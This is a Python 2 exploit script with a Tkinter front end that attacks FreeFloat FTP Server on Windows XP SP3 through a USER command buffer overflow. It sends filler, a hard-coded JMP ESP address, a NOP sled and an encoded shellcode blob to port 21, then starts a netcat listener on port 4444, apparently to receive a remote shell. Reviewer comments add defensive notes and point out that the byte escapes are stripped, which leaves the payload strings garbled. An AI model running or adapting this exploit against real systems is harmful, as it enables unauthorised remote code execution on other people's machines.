
# Title : Free Float FTP Server USER Command Buffer Overflow
# Published : 2012-12-09
# Author :


#Exploit title: FreeFloat FTP Server Remote Command Execution USER Command Buffer Overflow
#Date: 06/12/2012
#Exploit Author: D35m0nd142
#Vendor Homepage: http://www.freefoat.com
#Tested on Windows XP SP3 with Ubuntu 12.04
#!/usr/bin/python
import socket,sys,time,os
import Tkinter,tkMessageBox
# Shells out to `clear` as soon as the script starts, before any GUI exists;
# the exit status of the command is ignored.
os.system("clear")
def exploit():
	"""Tk button callback: send one oversized FTP USER command to the host in `ip`.

	Reads the target from the module-level Tkinter StringVar `ip`, connects to
	TCP port 21, prints whatever the server sends first, sends "USER " followed
	by junk + eip + nops + payload, closes the socket and then runs a local
	netcat listener on port 4444. Returns nothing; on any exception it prints a
	failure message and calls sys.exit(0).

	NOTE(review): as rendered on this page the string literals carry no
	backslash escapes ("x41", "rn", "nn"), so they are plain text rather than
	raw bytes; the escapes were presumably lost when the page was extracted.

	Defender notes: the USER argument built here is far longer than any real
	account name, so a length limit on FTP control-channel commands (in the
	server, a proxy or an IDS rule) covers this class of request. The return
	address is hard-coded; presumably it is tied to the Windows XP SP3 system
	named in the header and depends on modules loading at fixed addresses.
	"""
	# Taken verbatim from the GUI entry field; no validation is done on it.
	target = ip.get()
	junk = "x41" * 230     # Offset number --> 230 (filler placed ahead of `eip`)
	eip = "x53x93x37x7E"  # 0x7E379353   FFE4             JMP ESP
	# Padding placed between the address and the payload.
	nops = "x90" * 20
	# Opaque encoded blob; its contents are not analysed here.
	payload =("xb8xe9x78x9dxdbxdaxd2xd9x74x24xf4x5ex2bxc9" +
	"xb1x4fx31x46x14x83xc6x04x03x46x10x0bx8dx61" +
	"x33x42x6ex9axc4x34xe6x7fxf5x66x9cxf4xa4xb6" +
	"xd6x59x45x3dxbax49xdex33x13x7dx57xf9x45xb0" +
	"x68xccx49x1exaax4fx36x5dxffxafx07xaexf2xae" +	
	"x40xd3xfdxe2x19x9fxacx12x2dxddx6cx13xe1x69" +
	"xccx6bx84xaexb9xc1x87xfex12x5excfxe6x19x38" +
	"xf0x17xcdx5bxccx5ex7axafxa6x60xaaxfex47x53" +
	"x92xacx79x5bx1fxadxbex5cxc0xd8xb4x9ex7dxda" +
	"x0exdcx59x6fx93x46x29xd7x77x76xfex81xfcx74" +	
	"x4bxc6x5bx99x4ax0bxd0xa5xc7xaax37x2cx93x88" +
	"x93x74x47xb1x82xd0x26xcexd5xbdx97x6ax9dx2c" +
	"xc3x0cxfcx38x20x22xffxb8x2ex35x8cx8axf1xed" +
	"x1axa7x7ax2bxdcxc8x50x8bx72x37x5bxebx5bxfc" +
	"x0fxbbxf3xd5x2fx50x04xd9xe5xf6x54x75x56xb6" +	
	"x04x35x06x5ex4fxbax79x7ex70x10x0cxb9xe7x5b" +
	"xa7x44x78x33xbax46x69x98x33xa0xe3x30x12x7b" +
	"x9cxa9x3fxf7x3dx35xeax9fxdexa4x71x5fxa8xd4" +
	"x2dx08xfdx2bx24xdcx13x15x9exc2xe9xc3xd9x46" +
	"x36x30xe7x47xbbx0cxc3x57x05x8cx4fx03xd9xdb" +
	"x19xfdx9fxb5xebx57x76x69xa2x3fx0fx41x75x39" +
	"x10x8cx03xa5xa1x79x52xdax0exeex52xa3x72x8e" +
	"x9dx7ex37xbexd7x22x1ex57xbexb7x22x3ax41x62" +
	"x60x43xc2x86x19xb0xdaxe3x1cxfcx5cx18x6dx6d" +
	"x09x1exc2x8ex18")
	# Plain IPv4 TCP socket, created outside the try block.
	sock = socket.socket(socket.AF_INET,socket.SOCK_STREAM)

	try:
		# 21 is the FTP control port.
		sock.connect((target,21))
		print "nn[-] Sending exploit ..."
		# Reads up to 2000 bytes of the server's first response and prints it.
		print sock.recv(2000)
		# Everything is sent as the argument of a single USER command.
		sock.send("USER "+junk+eip+nops+payload+"rn")
		sock.close()
		# Blocks on a local netcat listener on port 4444. Presumably the payload
		# connects back to it (not verifiable from this listing); if so, an
		# outbound connection to 4444 from the FTP host right after an
		# over-long USER command is a useful detection signal.
		os.system("nc -lvp 4444")
	# Bare except: any error raised in the try body, not only a failed
	# connect, is reported as a connection failure.
	except:
		print "[-] Connection to "+target+" failed! n"
		# Exit status 0 is used even though this is the failure path.
		sys.exit(0)


# Builds a single-window Tk front end (Python 2 `Tkinter` module): one text
# entry for the target address and one button that runs the function above.
root=Tkinter.Tk()
# Fixed window size of 700x375.
root.geometry("%dx%d" %(700,375))
root.title("*** FreeFloat FTP Server Remote Code Execution USER Command Buffer Overflow***")
root['bg'] = 'black'
# NOTE: .pack() returns None, so `developer`, `ip_answer`, `ip_entry` and
# (below) `exploit` are all bound to None; the widgets themselves are still
# created and packed.
developer=Tkinter.Label(text="Developed by D35m0nd142").pack(side='bottom')
ip_answer=Tkinter.Label(text="IP Address ").pack()
# StringVar backing the entry field; the callback reads it through ip.get().
ip=Tkinter.StringVar()
ip_entry=Tkinter.Entry(textvariable=ip).pack()
# The Button receives the function object before this assignment rebinds the
# module-level name `exploit` to None; afterwards the callback is reachable
# only through the reference the Button holds.
exploit=Tkinter.Button(text="Exploit",command=exploit).pack()
# Enters the Tk event loop; blocks until the window is closed.
root.mainloop()